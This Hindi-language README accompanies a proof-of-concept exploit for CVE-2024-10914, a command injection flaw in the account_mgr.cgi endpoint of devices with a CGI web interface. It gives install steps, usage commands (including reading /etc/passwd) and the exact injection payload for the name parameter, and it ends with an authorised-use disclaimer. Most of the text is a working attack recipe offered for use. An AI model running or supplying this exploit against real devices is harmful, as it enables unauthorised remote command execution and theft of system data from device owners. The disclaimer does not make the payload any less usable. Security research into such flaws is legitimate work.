
CVE-2024-10914 का शोषण करने के लिए PoC
एंडपॉइंट /cgi-bin/account_mgr.cgi पर कमांड इंजेक्शन भेद्यता के लिए एक्सप्लॉइट। यह भेद्यता अनसैनिटाइज़्ड पैरामीटरों के जरिए प्रभावित सिस्टम पर मनमाने कमांड निष्पादित करने की अनुमति देती है।
CVE-2024-10914 एक कमांड इंजेक्शन भेद्यता है जो CGI वेब इंटरफ़ेस वाले उपकरणों को प्रभावित करती है। कमजोर एप्लिकेशन cgi_user_add अनुरोध में name पैरामीटर को सही ढंग से मान्य नहीं करता है, जिससे हमलावर सिस्टम कमांड इंजेक्ट कर सकता है जो एप्लिकेशन के विशेषाधिकारों के साथ निष्पादित होंगे।
रिपॉजिटरी को क्लोन करें और निर्भरताएँ स्थापित करें:
git clone https://github.com/0xSS3K/CVE-2024-10914__POC.git
cd CVE-2024-10914__POC
pip install -r requirements.txt
या मैन्युअल रूप से स्थापित करें:
pip install requests
स्क्रिप्ट दो तर्क प्रदान करती है:
python CVE-2024-10914_EXPLOIT.py -u <URL> -c <COMANDO>
-u, --url (आवश्यक): लक्ष्य का URL (उदाहरण: http://192.168.1.1)-c, --command (वैकल्पिक): निष्पादित करने के लिए कमांड (डिफ़ॉल्ट: id)id कमांड निष्पादित करें:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1
अनुकूलित कमांड निष्पादित करें:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "cat /etc/passwd"
फ़ाइलें सूचीबद्ध करें:
python CVE-2024-10914_EXPLOIT.py -u http://192.168.1.1 -c "ls -la /tmp"
एक्सप्लॉइट निम्नलिखित पेलोड के साथ कमजोर एंडपॉइंट पर एक GET अनुरोध भेजता है:
/cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name="; <COMANDO>; "
खाली स्ट्रिंग को उद्धरण चिह्नों से बंद किया जाता है और वांछित कमांड इंजेक्ट किया जाता है, जो सर्वर के संदर्भ में निष्पादित होता है।
स्क्रिप्ट प्रदर्शित करेगी:
यह कोड केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए प्रदान किया गया है। इसका उपयोग केवल उन प्रणालियों पर किया जाना चाहिए जिनके लिए आपके पास स्पष्ट प्राधिकरण है। इस एक्सप्लॉइट के अनधिकृत उपयोग से स्थानीय कानूनों का उल्लंघन हो सकता है और यह अपराध हो सकता है। लेखक इस उपकरण के दुरुपयोग के लिए जिम्मेदार नहीं है।
SS3K
निर्दिष्ट नहीं है